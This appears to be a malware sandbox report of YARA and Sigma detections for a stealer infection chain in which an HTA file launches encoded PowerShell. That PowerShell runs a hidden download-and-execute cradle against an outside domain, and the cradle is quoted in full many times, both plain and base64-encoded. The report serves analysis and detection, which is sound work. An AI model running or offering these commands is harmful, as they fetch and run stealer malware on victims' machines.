          Process Memory Space: powershell.exe PID: 4628JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: powershell.exe PID: 4628INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x450414:$b2: ::FromBase64String(
            • 0x24e83:$s1: -join
            • 0x450078:$s1: -join
            • 0x5b9c6f:$s1: -join
            • 0x5c6819:$s1: -join
            • 0x660a:$s3: reverse
            • 0x14151:$s3: reverse
            • 0x4c8fb2:$s3: reverse
            • 0x4ca5fe:$s3: reverse
            • 0x4ca8c9:$s3: reverse
            • 0x4caf3c:$s3: reverse
            • 0x4cb6e1:$s3: reverse
            • 0x4d3ab9:$s3: reverse
            • 0x4d6252:$s3: reverse
            • 0x4d666c:$s3: reverse
            • 0x4d71f4:$s3: reverse
            • 0x4d7ea1:$s3: reverse
            • 0x501e0b:$s3: reverse
            • 0x50eeef:$s3: reverse
            • 0x545bba:$s3: reverse
            • 0x551e04:$s3: reverse
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              SourceRuleDescriptionAuthorStrings
              5.2.powershell.exe.c973628.4.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                5.2.powershell.exe.c973628.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  5.2.powershell.exe.c973628.4.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
                  • 0x12d47:$s1: file:///
                  • 0x12c55:$s2: {11111-22222-10009-11112}
                  • 0x12cd7:$s3: {11111-22222-50001-00000}
                  • 0x111c0:$s4: get_Module
                  • 0x114dd:$s5: Reverse
                  • 0x10cf7:$s6: BlockCopy
                  • 0x10ca6:$s7: ReadByte
                  • 0x12d59:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                  5.2.powershell.exe.c973628.4.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                    5.2.powershell.exe.c973628.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 1 entries
                      SourceRuleDescriptionAuthorStrings
                      amsi32_744.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                        amsi32_4628.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                          System Summary

                          barindex
                          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <style> body { font-family: system-ui; font-weight: 300; font-size: 1.25rem; color: #36393a; display: flex; align-items: center; justify-content: center; } main { max-width: 1200px; margin-top: 120px; display: flex; flex-wrap: wrap; align-items: center; justify-content: center; } #text { max-width: 60%; margin-left: 1rem; margin-right: 1rem; } main > section > div { margin-bottom: 3.25rem; } svg { margin-left: 2rem; } @keyframes eye-1 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(-5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px); } } @keyframes eye-2 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px); } } svg > .eye-1 { animation: eye-1 3s infinite; } svg > .eye-2 { animation: eye-2 3s 0.6s infinite; } h1 { font-size: 3.75rem; font-weight: 400; margin-bottom: 0.5rem; } h3 { font-size: 2rem; font-weight: 400; color: #92979b; margin: 0; } a { color: #0055dc; } p { margin: 0; } #error-title { font-size: 2rem; margin-bottom: 1rem; } #footer-title { font-weight: 700; margin-bottom: 0.75rem; } </style> </head> <body> <main> <section id="text"> <div> <h1>Error 404</h1> <h3>Object not found</h3> </div> <div> <p> This object does not exist or is not publicly accessible at this URL. Check the URL of the object that you're looking for or contact the owner to enable Public access. </p> </div> <div> <p id="footer-title">Is this your bucket?</p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/" >Public Access</a > </p> </div> </section> <section> <svg width="414" height="212" viewBox="0 0 414 212" fill="none" xmlns="http://www.w3.org/2000/svg" > <ellipse cx="208.5" cy="166.5" rx="174.5" ry="45.5" fill="#E2F5FA" /> <path d="M205.516 80.2674H139.419L148.186 141.237H197.788L205.516 80.2674Z" fill="#C5EBF5" /> <path d="M205.516 80.2674H139.419L148.186 141.237H197.788L205.516 80.2674Z" stroke="#6ECCE5" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M205.516 80.2674H139.419L148.186 141.237H197.788L205.516 80.2674Z"
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 744, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , ProcessId: 4628, ProcessName: powershell.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\title.mp4.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6880, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, ProcessId: 744, ProcessName: powershell.exe
                          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\title.mp4.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6880, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, ProcessId: 744, ProcessName: powershell.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 744, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , ProcessId: 4628, ProcessName: powershell.exe
                          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 744, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , ProcessId: 4628, ProcessName: powershell.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 744, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , ProcessId: 4628, ProcessName: powershell.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 744, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" , ProcessId: 4628, ProcessName: powershell.exe
                          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=, 